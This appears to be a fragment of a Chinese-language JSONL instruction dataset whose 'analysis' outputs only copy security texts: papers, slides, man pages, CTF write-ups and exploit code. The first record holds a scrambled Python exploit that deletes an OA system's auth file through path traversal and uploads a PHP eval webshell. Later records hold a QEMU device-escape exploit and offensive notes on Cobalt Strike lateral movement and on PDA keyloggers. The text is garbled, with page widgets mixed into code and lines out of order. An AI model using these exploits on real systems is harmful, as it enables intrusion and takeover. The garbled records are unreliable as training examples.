4 payload=\"<?php eval($_POST['agan']);?>\" 5 print(\"[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA\") 6 input(\"Press enter to continue\") 7 print(\"[*]Deleting auth.inc.php....\") 8 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打赏 直接利上述代码即可改下你的URL地址即可 成功利 10 11 print(\"[*]Checking if file deleted...\") 12 url=target+\"/inc/auth.inc.php\" 13 page=requests.get(url=url).text 14 if 'No input file specified.' not in page: 15 print(\"[-]Failed to deleted auth.inc.php\") 16 exit(-1) 17 print(\"[+]Successfully deleted auth.inc.php!\") 18 print(\"[*]Uploading payload...\") 19 21 requests.post(url=url,files=files) 22 url=target+\"/_agan.php\" 23 page=requests.get(url=url).text 24 if 'No input file specified.' not in page: 25 print(\"[+]Filed Uploaded Successfully\") 26 print(\"[+]URL:\",url) 27 else: 28 print(\"[-]Failed to upload file\") 9 url=target+\"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php\" requests.get(url=url) url=target+\"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./\" 20 files = {'FILE1': ('agan.php', payload)} 订阅博主 关注 点赞 3 评论 2 分享 收藏 1 机看 打", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nʻpyREticʼ  In memory reverse engineering for obfuscated Python bytecode Rich Smith <rich@immunityinc.com> Immunity Inc Abstract Growing numbers of commercial and closed source applications are being developed using the Python programming language. The trend with developers of such applications appears to be that there is an increasing amount of effort being invested in order to stop the sourcecode of their application being easily obtainable by the end user. This is being achieved through the use of a variety of obfuscation techniques designed to impede the common methods of Python decompilation. Another trend occurring in parallel is the use of Python as an increasingly present component of 'Cloud' technologies where traditional bytecode decompilation techniques fall down not through obfuscation, but through lack of access to the bytecode files on disk. The techniques discussed in this paper extend existing Python decompilation technologies through taking an approach that does not require access to standard Python bytecode files (.pyc/.pyo), but rather focuses on gaining access to the bytecode through instantiated Python objects in memory and using these to reconstruct a sourcecode listing equivalent to that composed by the applications author. Approaches will also be discussed of how to defeat the common obfuscation techniques that have been observed in use in order to be able to use the in memory decompilation techniques. Finally a proof of concept embodiment of the techniques developed will be discussed which will allow people to quickly leverage them to evaluate code for bugs that was previously opaque to them. 1. The Problem Space The starting point for the work discussed was the need to be able to audit Pythoni applications for security relevant bugs in order to make assertions about the risk they may introduce into an environment. In the pursuit of this goal it became apparent that many closed source/non-free programs that were written in Python were making ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.fastjsondemo; import com.alibaba.fastjson.support.spring.annotation.ResponseJSONP; import org.springframework.http.MediaType; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.ResponseBody; @Controller public class JSONController { @RequestMapping(value = \"/\", method = RequestMethod.GET, produces = MediaType.APPLICATION_JSON_UTF8_VALUE) @ResponseBody public Object getUser() { User user = new User(); user.setName(\"Bob\"); user.setAge(25); return user; } @RequestMapping(value = \"/\", method = RequestMethod.POST, produces = MediaType.APPLICATION_JSON_UTF8_VALUE) @ResponseBody public Object setUser(@RequestBody User user) { user.setAge(20); return user; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 中级ROP 中级 ROP 主要是使用了一些比较巧妙的 Gadgets ## ret2csu ### 原理 在 64 位程序中函数的前 6 个参数是通过寄存器传递的但是大多数时候我们很难找到每一个寄存器对应的gadgets 这时候我们可以利用 x64 下的 __libc_csu_init 中的 gadgets这个函数是用来对 libc 进行初始化操作的而一般的程序都会调用 libc 函数所以这个函数一定会存在我们先来看一下这个函数(当然不同版本的这个函数有一定的区别) ```asm .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __libc_csu_init proc near ; DATA XREF: _start+16o .text:00000000004005C0 push r15 .text:00000000004005C2 push r14 .text:00000000004005C4 mov r15d, edi .text:00000000004005C7 push r13 .text:00000000004005C9 push r12 .text:00000000004005CB lea r12, __frame_dummy_init_array_entry .text:00000000004005D2 push rbp .text:00000000004005D3 lea rbp, __do_global_dtors_aux_fini_array_entry .text:00000000004005DA push rbx .text:00000000004005DB mov r14, rsi .text:00000000004005DE mov r13, rdx .text:00000000004005E1 sub rbp, r12 .text:00000000004005E4 sub rsp, 8 .text:00000000004005E8 sar rbp, 3 .text:00000000004005EC call _init_proc .text:00000000004005F1 test rbp, rbp .text:00000000004005F4 jz short loc_400616 .text:00000000004005F6 xor ebx, ebx .text:00000000004005F8 nop dword ptr [rax+rax+00000000h] .text:0000000000400600 .text:0000000000400600 loc_400600: ; CODE XREF: __libc_csu_init+54j .text:0000000000400600 mov rdx, r13 .text:0000000000400603 mov rsi, r14 .text:0000000000400606 mov edi, r15d .text:0000000000400609 call qword ptr [r12+rbx*8] .text:000000000040060D add rbx, 1 .text:0000000000400611 cmp rbx, rbp .text:0000000000400614 jnz short loc_400600 .text:0000000000400616 .text:0000000000400616 loc_400616: ; CODE XREF: __libc_csu_init+34j .text:0000000000400616 add rsp, 8 .text:000000000040061A pop rbx .text:000000000040061B pop rbp .text:000000000040061C pop r12 .text:000000000040061E pop r13 .text:0000000000400620 pop r14 .text:0000000000400622 pop r15 .text:0000000000400624 retn .text:0000000000400624 __libc_csu_init endp ``` 这里我们可以利用以下几点 - 从 0x000000000040061A 一直到结尾我们可以利用栈溢出构造栈上数据来控制 rbx,rbp,r12,r13,r14,r15", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 简介 横向渗透中Cobalt Strike给我们提供了 `psexec` `win` `winrm` 但是只是部分功能 顺便介绍下这几个工具 ### psexec >1通过ipc$连接然后释放psexesvc.exe到目标机器 2通过服务管理SCManager远程创建psexecsvc服务并启动服务 3客户端连接执行命令,服务端启动相应的程序并执行回显数据 Cobalt Strike 中提供2种psexec 用法 ``` beacon> help psexec Use: psexec [host] [share] [listener] Spawn a session on a remote host. This command generates an executable, copies it to the target, creates a service to run it, and cleans up after itself. You must specify which share (e.g., ADMIN$ or C$) to copy the file to. ``` ``` beacon> help psexec_psh Use: psexec_psh [host] [listener] Spawn a session on a remote host. This command creates a service on the target to start a PowerShell one-liner to bootstrap the desired listener. ``` 一种是用psexec生成会话 一种是利用psexec和powershell生成 psh都与powershell有关 ### WMI >WMI的全称是 Windows Management Instrumentation,它出现在所有的 Windows 操作系统中并由一组强大的工具集合组成用于管理本地或远程的 Windows 系统,攻击者使用wmi来进行攻击,但Windows系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性,越来越多的apt事件中使用WMI进行攻击利用WMI可以进行信息收集探测反病毒和虚拟机检测命令执行权限持久化等操作 ``` beacon> help wmi Use: wmi [host] [listener] Spawn a session on a remote host. This command uses WMI to run a PowerShell one-liner to bootstrap the desired listener. ``` 不过它这个工具是阉割了的只有help 提示的用法 # 0x01 psexec 横向渗透 >横向渗透攻击技术是复杂网络攻击中广泛使用的一种技术特别是在高级持续威胁Advanced Persistent ThreatsAPT中更加热衷于使用这种攻击方法攻击者可以利用这些技术以被攻陷的系统为跳板访问其他主机获取包括邮箱共享文件夹或者凭证信息在内的敏感资源攻击者可以利用这些敏感信息进一步控制其他系统提升权限或窃取更多有价值的凭证借助此类攻击攻击者最终可能获取域控的访问权限完全控制基于Windows系统的基础设施或与业务相关的关键账户 1. portscan ![Cobalt Strike ](./img/15.1.png) 这里我用portscan 简单的探测一下不推荐一来就这样搞,我只是中和一下前面的工具使用 2. view > targets 发现同一C段主机 192.168.130.131 和具体端口信息 你可以右键此目标Scan进行更为详细的端口扫描 ![Cobalt Strike ](./img/15.2.png) 然后右键可以进行`psexec` `win` 这里我演示GUI操作 也可以使用命令来操作 (都一样回来还是用的命令行) ![Cobalt Strike ](./img/15.3.png) ![Cobalt Strike ](./img/15.4.png) 成功返回目标system beacon 其他我就不演示了 大同小异 # 0x02 steal_token 这里我搭建了一个简单的域环境演示一下功能 ``` beacon> help steal_token Use: steal_token [pid] Steal an access token from a process. ``` 这个功能是在进程中窃取令牌 ![Cobalt Strike ](./img/15.6.png) 这里我们用 pse", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nArchitecturally Leaking Data from the Microarchitecture Black Hat USA 2022 Pietro Borrello Sapienza University of Rome Andreas Kogler Graz University of Technology Martin Schwarzl Graz University of Technology Moritz Lipp Amazon Web Services Daniel Gruss Graz University of Technology Michael Schwarz CISPA Helmholtz Center for Information Security ÆPIC Leak: Architecturally Leaking Uninitialized Data from the Microarchitecture Black Hat USA 2022 Pietro Borrello Sapienza University of Rome Andreas Kogler Graz University of Technology Martin Schwarzl Graz University of Technology Moritz Lipp Amazon Web Services Daniel Gruss Graz University of Technology Michael Schwarz CISPA Helmholtz Center for Information Security ÆPIC Leak  First architectural bug leaking data without a side channel 1 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) ÆPIC Leak  First architectural bug leaking data without a side channel  Not a transient execution attack 1 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) ÆPIC Leak  First architectural bug leaking data without a side channel  Not a transient execution attack  Deterministically leak stale data from SGX enclaves 1 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) ÆPIC Leak  First architectural bug leaking data without a side channel  Not a transient execution attack  Deterministically leak stale data from SGX enclaves  No hyperthreading required 1 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) ÆPIC Leak  First architectural bug leaking data without a side channel  Not a transient execution attack  Deterministically leak stale data from SGX enclaves  No hyperthreading required  10th, 11th, and 12th gen Intel CPUs affected 1 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) Outline 1. ÆPIC Leak 2. Understand what we leak 3. Control what we leak 4. Exploit ÆPIC Leak 5. Mitigations 2 Pietro Borrello (@borrello pietro) Andreas Kogler (@0xhilbert) What is ÆPIC Leak? Advanced", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" (c) 1993 by Thomas Koenig (ig25@rz.uni-karlsruhe.de) .\\\" .\\\" 在包括本版权通告和许可声明的前提下,允许一字不捺地生成和发布本篇的拷贝版本. .\\\" .\\\" 在遵照本许可声明的条款完整地发布了原作品的前提下,允许复制和发布本手册的修改版本. .\\\" .\\\" 因为Linux内核和库经常修改,本手册页可能会出现错误或者过时.作者(们)对文中错误或者行文繁冗不 .\\\" 承担责任,对因为使用包含在内的信息而造成的损失也不负责.对于许可免费的本手册,作者(们)可能在创 .\\\" 作它时考虑层次各有不同,当工作专业化之后,也许能够达到一致. .\\\" .\\\" 将该手册版式化或者加工处理,如果没有包括原本,则必须公认本作品的版权和作者. .\\\" .TH LOCALE 7 \"1993年4月24日\" \"Linux\" \"Linux Programmer's Manual(Linux程序员手册)\" .SH NAME(名称) locale \\- 描述多语言支持 .SH SYNOPSIS(总览) .nf .B #include <locale.h> .fi .SH DESCRIPTION(描述) locale 就是一系列语言文化规则. 它包括如下一些方面: 讯息的语言, 不同字符设置, 文字惯例, 等等. 程序需要能够判断其 locale 并根据适合于不同文化的要求来运行. .PP 头文件 .B <locale.h> 声明了用于该项作业中的数据类型,函数和宏. .PP 它声明的函数有: .B setlocale() 用来设置当前 locale, .B localeconv() 用来获得数字格式方面的信息. .PP 程序可能需要的本地化信息会有不同的种类; 它们都以宏的方式声明 把它们当做 .B setlocale() 的第一个参数来用, 就可以把其中一个设置为需要的 locale: .TP .B LC_COLLATE 这用来修改函数 .B strcoll() 和 .BR strxfrm() 的执行方式, 其中 strxfrm() 函数用来以本地化字母表进行字符串比较. 例如, 德国升半音的 s 排序为 \"ss\". .TP .B LC_CTYPE 修改字符处理分类函数如 .B isupper() 和 .BR toupper() 的执行方式, 还修改多字节字符函数如 .B mblen() 或者 .BR wctomb() 的执行方式. .TP .B LC_MONETARY 修改由 .B localeconv() 返回的信息, 这些信息描述了数字, 以及诸如 小数点和千进位逗号之类输出的常见格式的细节. 这些信息由函数 .BR strfmon() 在内部调用. .TP .B LC_MESSAGES 修改显示的语言信息以及正值和负值的表达方式. GNU C-library包含: .B rpmatch() 函数用于方便地使用这些信息. .TP .B LC_NUMERIC 在考虑使用 locale 设置时,修改 .B printf() 和 .B scanf() 函数族使用的信息.该信息也可以由 .B localeconv() 函数读取. .TP .B LC_TIME 修改 .B strftime() 函数的执行方式以显示适于当地格式的当前时间; 例如,欧洲的绝大部分地区使用的是 24 小时的时钟, 而美国则是 12 小时的时钟. .TP .B LC_ALL 上述所有的. .PP 如果 .B setlocale() 的第二个参数为空, 则设置 .BR \"\"\"\"\"\" , 为默认的locale,它通过以下几步来确定: .IP 1. 如果有非空的环境变量 .BR LC_ALL , 则使用 .B LC_ALL 的值. .IP 2. 如果存在一个与上述列出的种类同名的环境变量并且其不为空, 则使用该分类的值. .IP 3. 如果有非空的环境变量 .BR LANG , 则使用 .B LANG 的值. .PP 关于本地数字格式的值用于由 .B localeconv() 函数返回的 .B struct lconv , 其有以下声明: .nf struct lconv { /* 数码(非货币形式)信息. */ char *decimal_point; /* 小数点字符. */ char *thousands_sep; /* 千数的分隔符. */ /* 每个元素就是每组的阿拉伯数字;指数越高的元素在越左边.一个值为CHAR_MAX的元素表示不需继续 分组了.一个值为0的元素表示前面的字符用于所有更左边的组. */ char *grouping; /* 货币信息. */ /* 前三个字符是ISO 4217定义的流通符号. 第四个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 保护应用程序和 API 销售演练检查清单 Web 应用程序和 API 保护功能检查清单 在规划实施或优化信息安全策略的同时部署 Web 应用程序和 API 安全解决方案让您的企业获得理解独有风 险识别安全漏洞和检测威胁的强大能力您需要的是这样一种 Web 应用程序和 API 保护 (WAAP) 解决方案 - 它能够提供持续的监测能力和综合全面的见解还具有识别和阻止大部分复杂攻击的全面能力 这份检查清单可用于评估供应商能力也可以用作实施有效的 WAAP 解决方案时需要满足的需求列表 类别 1平台需求 企业的类型和规模林林总总并且具有不同水平的需求您的 Web 应用程序安全解决方案应该灵活 可扩展并且易于管理 具备与流量需求匹配的可扩展性 提供持续保护并且不会导致性能下降 架构能够应对跨地域分布式应用程序 带来的挑战 具备审核日志功能以确保合理使用 保护本地私有云或公共云包括多云 或混合云源站 能够抵御网络层 [L3/4] 分布式拒绝服务 (DDoS) 攻击并且提供 0 秒服务级别协议 在整个平台中融入通过众包模式获得的攻击 情报支持发现攻击者攻击频率和攻击严 重程度 通过端口 80 和 443 提供 Web 流量反向代理 功能 利用 SSL/TLS 加密保护网络隐私 2 Web 应用程序和 API 保护功能检查清单 保护应用程序和 API 销售演练检查清单 类别 2自适应 Web 应用程序和 DDoS 防护 您的 Web 应用程序安全机制必须超越基于签名的传统检测采用更加高级的自适应 Web 应用程序和 DDoS 防护以获得最为精准和可靠的安全效果 提供基于异常和风险的评分功能而不仅 限于基于签名的攻击检测 具备机器学习数据挖掘和启发法驱动的 检测能力从而识别快速不断变化的威胁 自动 Web 应用程序防火墙 (WAF) 规则能 够根据安全研究人员持续发布的实时威胁 情报更新 支持测试新的或更新的 WAF 规则在处理 实时流量方面的效果然后再将这些规则 部署到生产环境 以最低限度抵御 SQL 注入XSS 文件包含命令注入SSRFSSI 和 XXE 攻击 提供可全面自定义的预定义规则以满足 特定客户需求 能够抵御应用程序层 [L7] 容量耗尽 DoS 攻击这种类型的攻击会通过递归式应用 程序活动造成 Web 服务器不堪重负 完全托管式 WAF 规则无需持续配置和更新 提供针对个人和共享 IP 地址的客户端声誉 评分和情报 提供能快速抵御特定流量模式的自定义 规则虚拟修补 具备请求速率限制功能能够抵御自动化 或过多的爬虫程序流量 能够抵御指向源站的攻击 通过多个网络列表实施 IP/地域控制 阻止或允许来自特定 IP子网或地理 区域的流量 抵御自动化客户端例如漏洞扫描和 Web 攻击工具发起的攻击 3 Web 应用程序和 API 保护功能检查清单 保护应用程序和 API 销售演练检查清单 类别 3API 可见性防护和控制 API 防护已经成为 Web 应用程序安全的关键部分您需要具备稳健的 API 发现防护和控制能力的 WAAP 解决方案它应该能消除 API 漏洞减少您面对风险时的攻击面 自动发现和分析未知和/或不断变化的 API包括 API 端点特征和定义 支持自动检查 XML 和 JSON 请求 从而检测基于 API 的攻击 支持自定义 API 检查规则以满足特定用户 需求 能够预定义可接受的 XML 和 JSON 对象格 式以限制 API 请求的大小类型和深度 为 API 后端基础架构提供防护机制 抵御专为耗尽资源而发起的低速缓慢攻击 例如慢速 Post慢速 Get 可在 API 级别生成实时警报报告和仪表板 提供基于 API 密钥的 API 端点速率控制 节流功能 支持基于 IP/地域的 API 网络列表允许列表/ 拦截列表 带有版本控制的 API 生命周期管理 通过 JSON Web 令牌 (JWT) 验证保护身份验 证和授权 支持按密钥每个独立定义的密钥具有相应 配额定义允许的 API 请求从而全面掌控 用量 使用标准 API 定义Swagger/OAS 和 RAML进行 API 初始配置 4 Web 应用程序和 API 保护功能检查清单 保护应用程序和 API 销售演练检查清单 Akamai 为全球的大型企业提供安全的数字化体验Akamai 的智能边缘平台涵盖了从企业到云端的一切从而确保客户及其公司获 得快速智能且安全的体验全球优秀品牌依靠 Akamai 敏捷的解决方案扩展其多云架构的功能从而实现竞争优势Akamai 使决 策应用程序和体验更贴近用户帮助用户远离攻击和威胁Akamai 一系列的边缘安全Web 和移动性能企业访问和视频交付解 决方案均由优质客户服务分析和全天候监控提供支持如需了解全球优秀品牌信赖 Akam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH MKFIFO 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 mkfifo \\- 创建 FIFO命名管道 .SH 概述 \\fBmkfifo\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,名称\\/\\fP... .SH 描述 .\\\" Add any additional description here .PP 使用给定的名称创建命名管道FIFO .PP 必选参数对长短选项同时适用 .TP \\fB\\-m\\fP, \\fB\\-\\-mode\\fP=\\fI\\,模式\\/\\fP 将文件权限位设置为给定的模式类似 chmod而不是类似 a=rw 这样 .TP \\fB\\-Z\\fP 将 SELinux 安全上下文设置为默认类型 .TP \\fB\\-\\-context\\fP[=\\fI\\,CTX\\/\\fP] 类似 \\fB\\-Z\\fP或者如果指定了上下文则将 SELinux 或者 SMACK 安全上下文设置为指定类型 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 David MacKenzie 编写 .SH 报告错误 GNU coreutils 8.32 .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBmkfifo\\fP(3) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/mkfifo> .br 或者在本地使用 info \\(aq(coreutils) mkfifo invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMeticulously Modern Mobile Manipulations [DEF CON 27, Las Vegas]  Leon Jacobs $ whoami  Leon Jacobs / @leonjza  Security Researcher @ SensePost  Been Hacking stuff for ~ 10 years I also hated mobile application security a lot more in the past... Lets be honest about mobile application hacking $days since last public jailbreak Server Mode Gadget Mode pinning.checkPin.implementation = function () { // } Thats useful We can do more const file = Java.use(\"java.io.File\").$new(\"/\"); const file = ObjC.classes.SIFiles.alloc().init(); _ _ _ _ ___| |_|_|___ ___| |_|_|___ ___ | . | . | | -_| _| _| | . | | |___|___| |___|___|_| |_|___|_|_| |___|(object)inject(ion) demo http-file-browser.mov JavaScript [ObjC] Java() 0xfeedface Application Heaps Crypto Handlers Class Loaders Sockets Config Classes State Classes  Methods get / set properties  Property values have this data  Calling methods can alter state Java.choose(className, callbacks); ObjC.choose(specifier, callbacks); demo heap-ios-tiktok.mov dalvik.system.DexClassLoader Unknown Apps / Malware demo reflection.mov Existing Tools Module.load(\"/path/to/library.dylib\"); const loader = pathClassLoader.$new( \"/tool.jar\", null, getClassLoader()); loader.loadClass(\"com.tool.Name\");  @Flipboard  FLEX https://github.com/Flipboard/FLEX  @Facebook  Stetho https://github.com/facebook/stetho demo ios-flex-plugin.mov android-stetho.mov Integration Frida HTTP API Server HTTP Client JSON demo jenkins-binary-protections.mov Conclusions  Runtime analysis can be more than just hooking  We dont always* need root  Everyone can use it!  Lets explore more :P Thanks! @leonjza @sensepost https://git.io/objection", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Extremely Covert Bytes Category: Cryptography ## Description > DuckyDebugDuck is taking Computer Security this semester and he decided to create this encryption service using an encryption he seen in class, and again he hid a flag in it, see if you can get it. ## Solution Let's connect to the attached service: ```console root@kali:/media/sf_CTFs/technion/Extremely_Covert_Bytes# nc ctf.cs.technion.ac.il 4013 ______ _ ______ _ ______ _ | _ \\ | | | _ \\ | | | _ \\ | | | | | |_ _ ___| | ___ _| | | |___| |__ _ _ __ _| | | |_ _ ___| | __ | | | | | | |/ __| |/ / | | | | | / _ \\ '_ \\| | | |/ _` | | | | | | |/ __| |/ / | |/ /| |_| | (__| <| |_| | |/ / __/ |_) | |_| | (_| | |/ /| |_| | (__| < |___/ \\__,_|\\___|_|\\_\\\\__, |___/ \\___|_.__/ \\__,_|\\__, |___/ \\__,_|\\___|_|\\_\\ __/ | __/ | |___/ |___/ Enter the message you want to encrypt: > test f08e51ae8bff6986a3e3ad94c1e8efa7de53d1dd8325ce35fedcb2278090cd67 ``` So this service allows us to enter a string and have it encrypted. The challenge title hints that the encryption algorithm is [ECB](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#ECB): > The simplest of the encryption modes is the electronic codebook (ECB) mode (named after conventional physical codebooks). The message is divided into blocks, and each block is encrypted separately. > > The disadvantage of this method is a lack of diffusion. Because ECB encrypts identical plaintext blocks into identical ciphertext blocks, it does not hide data patterns well. ECB is not recommended for use in cryptographic protocols. Let's check by trying to encrypt a long message, and see if any of the encrypted blocks are identical: ```console root@kali:/media/sf_CTFs/technion/Extremely_Covert_Bytes# nc ctf.cs.technion.ac.il 4013 ______ _ ______ _ ______ _ | _ \\ | | | _ \\ | | | _ \\ | | | | | |_ _ ___| | ___ _| | | |___| |__ _ _ __ _| | | |_ _ ___| | __ | | | | | | |/ __| |/ / | | | | | / _ \\ '_ \\| | | |/ _` | | | | | | |/ __| |/ / | |/ /| |_| | (__| <| |_| | |/ / __/ |_) | |_| ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho am I?  Seth Fogie, VP Airscanner  Airscanner Mobile Security  Mobile AntiVirus  Mobile Encrypter  and more coming  Author  Security Warrior  Maximum Wireless Security  InformIT.com Security Section Overview  Basic Security Issues  Conceal A Backdoor Wizard  Keyboard Logger  Reverse Engineering Overview  The Invisible Spy  The Backdoor FTP Server  Hard Reset Code Extract  Window Mobile Buffer Overflow  Miscellaneous Attacks  Protections and Preventions Basic Security Issues  Intrinsically lacking in security  Lost/stolen/repaired/Sold PDAs  Password issues:  Stored in reg. Cpl swap. Bruteforce.  Biometrics  Bluetooth/IR issues  Wi-Fi issues  ActiveSync DoS connect/disconnect on port 5679  Network DoS attacks  ping i .001 <PDA IP>  Forensics Programs copy RAM/ROM image  Hard Reset/Soft Reset DoS (more on this later)  Autorun fun with folder 2577 (demos) Conceal A Backdoor Wizard (Cabwiz)  Trojan wrapper  Conceals Trojan install files & registry settings  Consolidates installation process into one step  Self extracting and self executing  CAB files self destructs  Created by Microsoftguaranteed to work  Steps  Create Trojan files & determine registry settings  Msdn.microsoft.com for instructions  .inf file contains all relevant information  C:\\Cabwiz fungame.inf = fungame.cab What is a PDA Keyboard  What is a Windows Mobile Keyboard?  Large bitmap  Code to define what section to load  Key array to define key press behavior  Character to be typed  Button coordinates to be pushed  Packaged as core DLL (MSIM.DLL)  Configured via registry settings Keyboard Logger?  Challenges  Requires creation of custom alternate keyboard  Installable DLL with registry settings  OS and OEM variations  Creation  Soft Input Panel Starters:  Programming CE .NET (sample numerical keyboard)  Platform Builder (sample SIP)  EVC4  SIP Code + (CreateFile, SetFilePointer, WriteFile) Keyboard Logger Details  The Code  HANDLE hfile;  hfile=CreateFile(TEXT(\"\\\\logfile.txt\"), GENERIC_WRITE, FILE_SHA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAntenna comparison 20 antennas were tested to see which ones were the best for receiving. All the antennas are 3/4\" Motorola TAD/TAE mount (aka \"NMO\"). The following lists are ordered as per what you see in the picture (left to right). General information: Manufacturer Model Type Freq rating/gain ------------------- ------------------ ---------------------------------------------- ------------------------- Larsen NMO-27 (new style) 1/4 wave base loaded 27-28/0dB Radiall/Larsen NMO-27B 1/4 wave base loaded 27-28/0dB Larsen NMO-30B 1/4 wave base loaded 30-40/0dB Larsen NMO-50C 1/4 wave base loaded 47-54/0dB Larsen NMO-2/70 (old sytle) loaded 1/2 (VHF), closed coil collinear (UHF) 144- 148/6dB 440-450/3.5dB Larsen NMO-150 (new sytle) 5/8 wave base loaded 144-148/3dB Larsen NMO-Q 1/4 wave 150-170/0dB Larsen NMO-Q 1/4 wave 95-105/0dB Antenna Specialists ASPRD1615 1/4 wave 430-470/0dB Maxrad BMUF9000 1/4 wave 896-940/0dB Larsen NMO-450 5/8 over 1/2 wave closed coil collinear 450-470/3.4dB Motorola TDE6082A (?) closed coil collinear 460-470/5dB Larsen NMO-UHF 5/8 over 1/4 wave open coil collinear 450-470/3.2dB Maxrad BMUF8125 1/2 over 1/2 over 1/4 wave open coil trilinear 806-866/5dB Maxrad BMUF9043 1/2 over 1/4 wave open coil collinear elevated 896- 940/3dB Larsen NMO-800 5/8 over 1/2 wave closed coil collinear 806-866/3.4dB Maxrad unknown 5/8 over 1/2 wave open coil collinear 806-866/3.4dB Larsen NMO3E825B 5/8 over 1/4 wave closed coil collinear 825-896/3.2dB Larsen NMO5E825B 5/8 over 5/8 over 1/4 wave closed coil trilinear 825-896/5dB Maxrad BMAXSCAN1000 double 1/2 over 1/4 closed coil collinear (800) VHF/UHF/800 Performance: Model LW AM SW CB VHF-Lo FM Air VHF-150 VHF-165 VHF-TV 220 MilAir UHF-Lo UHF-Hi UHF-TV 800 900 -------------------- -- -- -- -- ------ -- --- ------- ------- ------ --- ------ ------ ------ ------ --- --- NMO-27 (new style) 2 5 5 7 2 2 - - - 2 1 - 2 - 2 6 4 NMO-27B - 1 4 7 5 4 4 2 3 4 4 1 2 1 5 4 4 NMO-30B - 1 4 7 5 4 2 1 2 4 5 - 2 1 5 1 3 NMO-50C ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nd3ctf WriteUp By Nu1L author:Nu1L d3ctf WriteUp By Nu1L PWN d3dev d3dev-revenge Truth hackphp liproll Reverse jumpjump baby_spear No Name white give Ancient Crypto babyLattice WEB 8-bit pub non RCE? Happy_Valentine's_Day Pool Calc real_cloud_storage real_cloud_serverless Misc Virtual Love_Revenge Virtual Love easyQuantum Signin shellgen2 PWN d3dev 没关monitor,直接搞 d3dev-revenge mmio有越界读写 控制下seek和addr,中间有个tea #include <assert.h> #include <fcntl.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/io.h> #include <sys/mman.h> #include <sys/types.h> #include <unistd.h> unsigned char *mmio_mem; void die(const char *msg) { perror(msg); exit(-1); } unsigned int pmio_base = 0xc040; uint32_t pmio_read(uint32_t addr) { return (uint32_t)inl(addr+pmio_base); } void pmio_write(uint32_t addr, uint32_t value) { outl(value, addr+pmio_base); } void mmio_write(uint32_t addr, uint64_t value) { *((uint64_t *)(mmio_mem + addr)) = value; } uint64_t mmio_read(uint32_t addr) { return *((uint64_t *)(mmio_mem + addr)); } void enc (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */ uint32_t delta=0x9e3779b9; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i < 32; i++) { /* basic cycle start */ sum += delta; v0 += ((v1<<4) + k0)  (v1 + sum)  ((v1>>5) + k1); v1 += ((v0<<4) + k2)  (v0 + sum)  ((v0>>5) + k3); } /* end cycle */ v[0]=v0; v[1]=v1; } void dec (uint32_t* v, uint32_t* k) { uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */ uint32_t delta=0x9e3779b9; /* a key schedule constant */ uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */ for (i=0; i<32; i++) { /* basic cycle start */ v1 -= ((v0<<4) + k2)  (v0 + sum)  ((v0>>5) + k3); v0 -= ((v1<<4) + k0)  (v1 + sum)  ((v1>>5) + 